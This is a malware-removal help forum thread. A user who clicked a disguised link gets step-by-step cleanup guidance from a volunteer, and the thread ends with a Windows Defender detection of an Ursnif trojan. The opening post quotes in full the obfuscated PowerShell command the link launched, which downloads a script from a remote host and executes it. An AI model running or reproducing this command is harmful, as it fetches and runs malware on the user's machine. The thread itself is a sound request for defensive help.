Jump to content
Due to inclement weather in Southwest Florida, our Clearwater support team is offline. Our other offices are available to assist you, however their responses may be delayed. We appreciate your patience and understanding during this time. ×

Clicked a link, now, possibly infected.

Recommended Posts

I wasn't paying close enough attention, and ended up clicking a link that I thought was a video file. The link directed to "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ok=[string][char[]]@(0x49,0x45,0x78) -replace ' ','';sal s $ok;$isp=((New-Object Net.WebClient)).DownloadString('http://shortit.xyz/stats');s $isp"

I've seen a few other people reporting this same thing on the forum. I was hoping to get some assistance. Here are my scan logs. Thank you very much for any help!

AdwCleaner[S00].txt Malwarebyteslog.txt FRST.txt Addition.txt

Link to post
Share on other sites

Hi,  @themb    :welcome:

My name is Maurice. I will be helping and guiding you, going forward on this case.


I would suggest  to get the pc into windows Safe Mode, so we can have you run Malwarebytes there.


lets get the machine into Safe mode.

This article is a how-to on how to get to safe mode for Windows 10 
· Windows 10: http://windows.microsoft.com/en-gb/windows-10/start-your-pc-in-safe-mode

{ B }
Run a scan with Malwarebytes.
Start Malwarebytes from the Start menu.

Click Settings. Then click the Protection tab.
Scroll down and lets be sure the line in SCAN OPTIONs for "Scan for rootkits" is ON
Click it to get it ON

Click the SCAN button.
Select a Threat Scan ( which should be the default).

When the scan phase is done, be real sure you Review and have all detected lines items check-marked on each line on the left. That too is very critical.

Then click on Quarantine selected.


Be sure all items were removed. Then too, Repeat the scan one more time. It does not take long.

and again, be sure all detected items are removed.

Let it remove what it has detected.
{ C }
Now, Restart Windows back to normal mode.

When that is completed, kindly send the report.
In Malwarebytes.
Click the Reports button ( on the left )
Look for the "Scan Report" that has the most recent Date and time.

When located, click the check box for it and click on View Report.
Then click the Export button at the bottom left.
Then select Text File (*.txt)

Put in a name for that file and remember where the file is created.

Then attach that file

Link to post
Share on other sites

Good morning.

Not sure what you asked today.   But, I had sent a reply with procedures to do on Saturday the 13th.  See post # 2 above.

Did you see that ?   Did you do those ?   Then, I would like, when completed, the results of the scans by Malwarebytes for Windows,   and a summary status from you on the original issue.

Also, the location of the link you refer to.   Where is it on your machine, if still there.

Link to post
Share on other sites

Thanks for the report. 

Windows 10 has the Microsoft Windows Defender which can run the Windows Defender Offline scan.
Windows Defender Offline in Windows 10 can be run directly from within Windows, without having to create bootable media.

Click the Windows Start menu button on the Taskbar, select Settings icon. Then choose Update and Security.
Then look on the right hand side and click on Windows Defender.
Then, scroll all the way down on the scroll bar, down to where you see "Windows Defender Offline"
Click on the button Scan Offline to start the process and let it scan the system.

Keep in mind that the design and what is scanned by Windows Defender is a whole different design from Malwarebytes. But do let me know how this scan goes and what the result is.


Let me know if you need something else.

Link to post
Share on other sites

Sorry for the delay. The anxiety of being infected led to me just not using this computer. So, I booted into safe mode and did 2 Malwarebytes scans. Attached are my logs. I also just ran a Windows Defender offline scan, but I wasn't present to see the results, and my computer restarted.

Some more information: When I first clicked the link, Windows Defender popped up that something was found, but then it immediately went away. I think whatever I downloaded was blocking Windows Defender from displaying the infection. I have since ran more Windows Defender scans. Tonight it finally found and removed: Trojan:Win32/Ursnif!MTB. I don't know if this is just one of multiple viruses I now have. I know other people who clicked this same link were told to run a FRST64 text file or something. Is there anything like that I should do? I am going to bed now, but I will check this thread again tomorrow and run any recommended procedures. Thanks so much for the help! 

Malwarebytessafemodescan.txt Malwarebytessafemodescan2.txt

Link to post
Share on other sites

Thanks for the notes and the Malwarebytes scan reports.  You indicate you ran these in Safe mode.

I would like you to run this special scan tool in normal Windows.

Please read all of these lines first so that it is all clear to you about our plan. I need a one time run of MBAR like listed here, please.

Please download Malwarebytes Anti-Rootkit (MBAR) from this link here

and save it to your desktop.


Doubleclick on the MBAR file and allow it to run.

•Click OK on the next screen, to allow the package to extract the contents of the file to its own folder named mbar.

•mbar.exe will launch automatically. On some systems, this may take a few extra seconds. Please be patient and wait for the program to open.

•After reading the Introduction, click 'Next' if you agree.

•On the Update Database screen, click on the 'Update' button.

•Once you see 'Success: Database was successfully updated' click on 'Next', then click the Scan button.

With some infections, you may see two messages boxes:

1.'Could not load protection driver'. Click 'OK'.
2.'Could not load DDA driver'. Click 'Yes' to this message, to allow the driver to load after a restart. Allow the computer to restart. Continue with the rest of these instructions.

•If malware is found, press the Cleanup button when the scan completes. .

Please attach the log it produces, you'll find the log in that mbar folder as MBAR-log-<date and time>***.txt . Please attach that to your next reply.


other NOTES:

running FRST report is not a cure-all.   It is a report & in the report mode does not make changes.

On later rounds, I can see about guiding you to research on what Windows Defender detected & removed.

The win32/ursnif (as classified by Microsoft) is a family of trojan that has several variations.

My view is that Windows Defender snagged some item ( from the end result of the original clicking)  and quite likely quarantined it on day 1.

Link to post
Share on other sites

Howdy. Thanks again for the help. I ran the MalwareBytes Anti-rootkit. It didn't find anything, but there's also no log on the folder I extracted it to. Attached is a MalwareBytes non-safe mode scan log. I think you're right. Looking at the Windows Defender quarantine log, the detect and quarantine was from the day I clicked on the link. Do you suggest anything else, or do you think Windows Defender handled it when I clicked it?


Link to post
Share on other sites

Hello themb.

Thanks for the reports.  I do tend to think that Windows Defender found 'the suspect" on day 1.


This is the way to look at the Windows Defender scan history.

Go to the Windows Start menu.  Click on the Settings icon.

Now click on Update & Security.   Then click on Open Windows Security.

·  Click the Virus & threat protection tile     and then the Protection  history label  ( in blue color)



If you wish, you can do a scan at Microsoft with their Safety scanner.

The Microsoft Safety Scanner is a free stand-alone virus scanner that  can be used to scan for & remove malware or potentially unwanted software from a system.

The download links & the how-to-run-the tool are at this link at Microsoft



Let me know the result.  Let me know if you need anything else.

Link to post
Share on other sites

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.



Link to post
Share on other sites

This topic is now closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.